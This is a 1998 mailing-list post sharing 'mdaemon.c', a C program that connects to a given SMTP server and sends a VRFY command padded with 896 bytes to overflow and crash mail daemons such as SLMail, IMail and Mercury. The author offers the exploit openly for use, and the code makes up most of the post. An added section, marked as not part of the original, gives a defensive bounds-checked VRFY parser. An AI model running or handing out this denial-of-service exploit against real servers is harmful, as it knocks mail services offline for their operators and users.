smtp overflows
Jon Beaton (steven EFNI.COM) Wed, 8 Apr 1998 07:10:25 -0400
There have been more posts about the buffer overflows on smtp daemons, so I thought this may be useful. After posting about these attacks on SLMail and Imail, I found that there were a lot more that were still affected. On the few I've tried on the Mac, like Mercury, it had locked the server up, much like Appleshare. Anyways, this is just mdaemon.c with just a few tiny changes, just thought it may be useful.

Btw, I just wanted to note that this will also crash IMail, even though the author has said it wasn't affected.

Jon

/*
  mdaemon.c with a few small changes. known to lock up the whole server
  with some daemons on the Mac
  Cisc0Undernet
*/

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

void main(int argc, char *argv[])
{
  struct sockaddr_in sin;
  struct hostent *hp;
  char *buffer;
  int sock, i;

  if (argc != 2) {
    printf("usage: %s <smtp server>\n", argv[0]);
    exit(1);
  }
  hp = gethostbyname(argv[1]);
  if (hp==NULL) {
    printf("Unknown host: %s\n",argv[1]);
    exit(1);
  }
  bzero((char*) &sin, sizeof(sin));
  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  sin.sin_family = hp->h_addrtype;
  sin.sin_port = htons(25);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  connect(sock,(struct sockaddr *) &sin, sizeof(sin));
  buffer = (char *)malloc(1000);
  sprintf(buffer, "VRFY ");
  for (i = 0; i<896; i++)
    strcat(buffer, "d");
  strcat(buffer, "\r\n");
  write(sock, &buffer[0], strlen(buffer));
  close(sock);
  free(buffer);
}
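Added example, not part of the original post and not code from any of the daemons it names: a bounds-checked VRFY handler that refuses the 903-byte line built by the program above before copying anything. The function names, the result codes and the 256-byte mailbox buffer are assumptions; the 512-byte command line limit is from RFC 821.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define SMTP_LINE_MAX 512  /* RFC 821 limit for a command line, CRLF included */
#define MAILBOX_MAX   256  /* assumed size of the daemon's mailbox buffer */
enum vrfy_result { VRFY_OK, VRFY_NOT_VRFY, VRFY_LINE_TOO_LONG,
                   VRFY_NO_CRLF, VRFY_ARG_TOO_LONG, VRFY_EMPTY };

/* Hypothetical handler: copy the VRFY argument of a received line into
 * out[outsz]. len is the byte count read; line need not be NUL-terminated. */
enum vrfy_result parse_vrfy(const char *line, size_t len, char *out, size_t outsz)
{
    if (outsz == 0) return VRFY_ARG_TOO_LONG;
    out[0] = '\0';
    if (len > SMTP_LINE_MAX) return VRFY_LINE_TOO_LONG; /* reject before copying */
    if (len < 2 || memcmp(line + len - 2, "\r\n", 2) != 0) return VRFY_NO_CRLF;
    len -= 2;                                           /* drop the CRLF */
    if (len < 5) return VRFY_NOT_VRFY;
    for (size_t i = 0; i < 5; i++)                      /* case-insensitive verb */
        if (toupper((unsigned char)line[i]) != "VRFY "[i]) return VRFY_NOT_VRFY;
    const char *arg = line + 5;
    size_t arglen = len - 5;
    while (arglen > 0 && *arg == ' ') { arg++; arglen--; }
    if (arglen == 0) return VRFY_EMPTY;
    if (arglen >= outsz) return VRFY_ARG_TOO_LONG;      /* no room for the NUL */
    memcpy(out, arg, arglen);
    out[arglen] = '\0';
    return VRFY_OK;
}

/* Run parse_vrfy on a constructed line: "VRFY " + n filler bytes + CRLF. */
enum vrfy_result try_fill(size_t n, char *out, size_t outsz)
{
    char line[1024] = "VRFY ";
    if (n > sizeof line - 7) return VRFY_LINE_TOO_LONG;
    memset(line + 5, 'd', n);
    memcpy(line + 5 + n, "\r\n", 2);
    return parse_vrfy(line, n + 7, out, outsz);
}

int main(void)
{
    char out[MAILBOX_MAX];
    size_t fill[] = { 10, 300, 896 };  /* 896 is the filler count in the post */
    for (size_t i = 0; i < 3; i++)
        printf("%zu filler bytes -> %d\n", fill[i], (int)try_fill(fill[i], out, sizeof out));
    return 0;
}
```

A line that passes the 512-byte check can still carry an argument larger than the destination buffer, which is why the argument length is checked separately against outsz.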